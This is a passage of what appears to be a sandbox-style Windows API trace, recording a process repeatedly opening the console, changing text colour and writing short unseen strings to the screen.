lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0152.816] GetLastError () returned 0xcb [0152.816] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.816] GetLastError () returned 0xcb [0152.820] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0152.820] GetLastError () returned 0xcb [0152.820] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.820] GetLastError () returned 0xcb [0152.824] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.825] GetLastError () returned 0xcb [0152.825] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.825] GetLastError () returned 0xcb [0152.825] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0152.825] GetLastError () returned 0xcb [0152.825] CloseHandle (hObject=0x53) returned 1 [0152.825] GetLastError () returned 0xcb [0152.829] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.868] GetLastError () returned 0xcb [0152.868] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.868] GetLastError () returned 0xcb [0152.868] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0152.868] GetLastError () returned 0xcb [0152.868] CloseHandle (hObject=0x53) returned 1 [0152.868] GetLastError () returned 0xcb [0152.872] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.872] GetLastError () returned 0xcb [0152.872] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0152.873] GetLastError () returned 0xcb [0152.873] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2e04ed4*, nNumberOfCharsToWrite=0x39, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e04ed4*, lpNumberOfCharsWritten=0x5f5efac*=0x39) returned 1 [0152.873] GetLastError () returned 0xcb [0152.873] CloseHandle (hObject=0x53) returned 1 [0152.873] GetLastError () returned 0xcb [0152.877] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.878] GetLastError () returned 0xcb [0152.878] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.879] GetLastError () returned 0xcb [0152.879] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0152.879] GetLastError () returned 0xcb [0152.879] CloseHandle (hObject=0x53) returned 1 [0152.879] GetLastError () returned 0xcb [0152.883] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.883] GetLastError () returned 0xcb [0152.883] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.883] GetLastError () returned 0xcb [0152.883] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0152.884] GetLastError () returned 0xcb [0152.884] CloseHandle (hObject=0x53) returned 1 [0152.884] GetLastError () returned 0xcb [0152.888] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.888] GetLastError () returned 0xcb [0152.888] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0152.888] GetLastError () returned 0xcb [0152.888] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0152.888] GetLastError () returned 0xcb [0152.889] CloseHandle (hObject=0x53) returned 1 [0152.889] GetLastError () returned 0xcb [0152.893] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0152.893] GetLastError () returned 0xcb [0152.893] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.894] GetLastError () returned 0xcb [0152.894] GetConsoleOutputCP () returned 0x1b5 [0152.894] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.894] GetLastError () returned 0xcb [0152.898] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0152.898] GetLastError () returned 0xcb [0152.899] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.899] GetLastError () returned 0xcb [0152.902] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0152.902] GetLastError () returned 0xcb [0152.903] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0152.903] GetLastError () returned 0xcb [0152.906] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.941] GetLastError () returned 0xcb [0152.941] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.942] GetLastError () returned 0xcb [0152.942] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0152.942] GetLastError () returned 0xcb [0152.942] CloseHandle (hObject=0x5f) returned 1 [0152.942] GetLastError () returned 0xcb [0152.946] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.946] GetLastError () returned 0xcb [0152.946] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0152.946] GetLastError () returned 0xcb [0152.946] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0152.947] GetLastError () returned 0xcb [0152.947] CloseHandle (hObject=0x5f) returned 1 [0152.947] GetLastError () returned 0xcb [0152.951] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.952] GetLastError () returned 0xcb [0152.952] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0152.952] GetLastError () returned 0xcb [0152.952] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2e053c0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e053c0*, lpNumberOfCharsWritten=0x5f5efac*=0x4f) returned 1 [0152.952] GetLastError () returned 0xcb [0152.952] CloseHandle (hObject=0x5f) returned 1 [0152.953] GetLastError () returned 0xcb [0152.957] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.957] GetLastError () returned 0xcb [0152.957] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.957] GetLastError () returned 0xcb [0152.958] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0152.958] GetLastError () returned 0xcb [0152.958] CloseHandle (hObject=0x5f) returned 1 [0152.958] GetLastError () returned 0xcb [0152.963] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.963] GetLastError () returned 0xcb [0152.963] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0152.963] GetLastError () returned 0xcb [0152.963] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0152.963] GetLastError () returned 0xcb [0152.963] CloseHandle (hObject=0x5f) returned 1 [0152.964] GetLastError () returned 0xcb [0152.968] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.969] GetLastError () returned 0xcb [0152.969] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0152.969] GetLastError () returned 0xcb [0152.969] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0152.969] GetLastError () returned 0xcb [0152.969] CloseHandle (hObject=0x5f) returned 1 [0152.969] GetLastError () returned 0xcb [0152.974] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0152.975] GetLastError () returned 0xcb [0152.975] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0152.975] GetLastError () returned 0xcb [0152.975] GetConsoleOutputCP () returned 0x1b5 [0152.975] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0152.975] GetLastError () returned 0xcb [0152.980] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0153.017] GetLastError () returned 0xcb [0153.017] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0153.017] GetLastError () returned 0xcb [0153.022] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0153.022] GetLastError () returned 0xcb [0153.022] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0153.022] GetLastError () returned 0xcb [0153.026] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.026] GetLastError () returned 0xcb [0153.026] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0153.027] GetLastError () returned 0xcb [0153.027] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0153.027] GetLastError () returned 0xcb [0153.027] CloseHandle (hObject=0x6b) returned 1 [0153.027] GetLastError () returned 0xcb [0153.032] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.032] GetLastError () returned 0xcb [0153.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0153.032] GetLastError () returned 0xcb [0153.032] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0153.033] GetLastError () returned 0xcb [0153.033] CloseHandle (hObject=0x6b) returned 1 [0153.033] GetLastError () returned 0xcb [0153.037] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.037] GetLastError () returned 0xcb [0153.037] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0153.037] GetLastError () returned 0xcb [0153.037] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2e0589c*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e0589c*, lpNumberOfCharsWritten=0x5f5efac*=0x19) returned 1 [0153.038] GetLastError () returned 0xcb [0153.038] CloseHandle (hObject=0x6b) returned 1 [0153.038] GetLastError () returned 0xcb [0153.042] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.042] GetLastError () returned 0xcb [0153.042] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0153.043] GetLastError () returned 0xcb [0153.043] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0153.043] GetLastError () returned 0xcb [0153.043] CloseHandle (hObject=0x6b) returned 1 [0153.043] GetLastError () returned 0xcb [0153.048] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.048] GetLastError () returned 0xcb [0153.048] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0153.048] GetLastError () returned 0xcb [0153.048] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0153.048] GetLastError () returned 0xcb [0153.049] CloseHandle (hObject=0x6b) returned 1 [0153.049] GetLastError () returned 0xcb [0153.054] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.093] GetLastError () returned 0xcb [0153.094] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0153.094] GetLastError () returned 0xcb [0153.094] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0153.094] GetLastError () returned 0xcb [0153.094] CloseHandle (hObject=0x6b) returned 1 [0153.094] GetLastError () returned 0xcb [0153.098] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0153.098] GetLastError () returned 0xcb [0153.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0153.099] GetLastError () returned 0xcb [0153.099] GetConsoleOutputCP () returned 0x1b5 [0153.099] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0153.099] GetLastError () returned 0xcb [0153.103] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0153.103] GetLastError () returned 0xcb [0153.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0153.103] GetLastError () returned 0xcb [0153.108] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0153.108] GetLastError () returned 0xcb [0153.108] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0153.108] GetLastError () returned 0xcb [0153.113] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.113] GetLastError () returned 0xcb [0153.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0153.113] GetLastError () returned 0xcb [0153.113] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0153.113] GetLastError () returned 0xcb [0153.114] CloseHandle (hObject=0x77) returned 1 [0153.114] GetLastError () returned 0xcb [0153.118] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.119] GetLastError () returned 0xcb [0153.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0153.119] GetLastError () returned 0xcb [0153.119] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0153.119] GetLastError () returned 0xcb [0153.119] CloseHandle (hObject=0x77) returned 1 [0153.119] GetLastError () returned 0xcb [0153.124] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.125] GetLastError () returned 0xcb [0153.125] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0153.125] GetLastError () returned 0xcb [0153.125] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2e05c34*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e05c34*, lpNumberOfCharsWritten=0x5f5efac*=0x36) returned 1 [0153.125] GetLastError () returned 0xcb [0153.125] CloseHandle (hObject=0x77) returned 1 [0153.125] GetLastError () returned 0xcb [0153.130] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.167] GetLastError () returned 0xcb [0153.167] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0153.167] GetLastError () returned 0xcb [0153.167] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0153.167] GetLastError () returned 0xcb [0153.167] CloseHandle (hObject=0x77) returned 1 [0153.168] GetLastError () returned 0xcb [0153.172] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.172] GetLastError () returned 0xcb [0153.172] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5f5ef5c | out: lpConsoleScreenBufferInfo=0x5f5ef5c) returned 1 [0153.172] GetLastError () returned 0xcb [0153.172] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0153.173] GetLastError () returned 0xcb [0153.173] CloseHandle (hObject=0x77) returned 1 [0153.173] GetLastError () returned 0xcb [0153.177] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.177] GetLastError () returned 0xcb [0153.177] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x5f5efec | out: lpMode=0x5f5efec) returned 1 [0153.178] GetLastError () returned 0xcb [0153.178] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2b39938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efec, lpReserved=0x0 | out: lpBuffer=0x2b39938*, lpNumberOfCharsWritten=0x5f5efec*=0x1) returned 1 [0153.178] GetLastError () returned 0xcb [0153.178] CloseHandle (hObject=0x77) returned 1 [0153.178] GetLastError () returned 0xcb [0153.182] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.183] GetLastError () returned 0xcb [0153.183] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5f5efb8 | out: lpConsoleScreenBufferInfo=0x5f5efb8) returned 1 [0153.183] GetLastError () returned 0xcb [0153.183] GetConsoleOutputCP () returned 0x1b5 [0153.183] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5f5efc0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5f5efc0) returned 0 [0153.183] GetLastError () returned 0xcb [0153.188] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0153.188] GetLastError () returned 0xcb [0153.188] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0153.188] GetLastError () returned 0xcb [0153.193] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0153.193] GetLastError () returned 0xcb [0153.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x5f5ef58 | out: lpConsoleScreenBufferInfo=0x5f5ef58) returned 1 [0153.193] GetLastError () returned 0xcb [0153.198] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.198] GetLastError () returned 0xcb [0153.198] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0153.198] GetLastError () returned 0xcb [0153.198] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0153.198] GetLastError () returned 0xcb [0153.198] CloseHandle (hObject=0x83) returned 1 [0153.199] GetLastError () returned 0xcb [0153.203] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.243] GetLastError () returned 0xcb [0153.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5f5ef60 | out: lpConsoleScreenBufferInfo=0x5f5ef60) returned 1 [0153.243] GetLastError () returned 0xcb [0153.243] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0153.243] GetLastError () returned 0xcb [0153.243] CloseHandle (hObject=0x83) returned 1 [0153.244] GetLastError () returned 0xcb [0153.248] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.264] GetLastError () returned 0xcb [0153.264] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x5f5efac | out: lpMode=0x5f5efac) returned 1 [0153.264] GetLastError () returned 0xcb [0153.264] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2e0602c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5f5efac, lpReserved=0x0 | out: lpBuffer=0x2e0602c*, lpNumberOfCharsWritten=0x5f5efac*=0x1) returned 1 [0153.265] GetLastError () returned 0xcb [0153.265] CloseHandle (hObject=0x83) returned 1 [0153.265] GetLastError () returned 0xcb [0153.270] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, 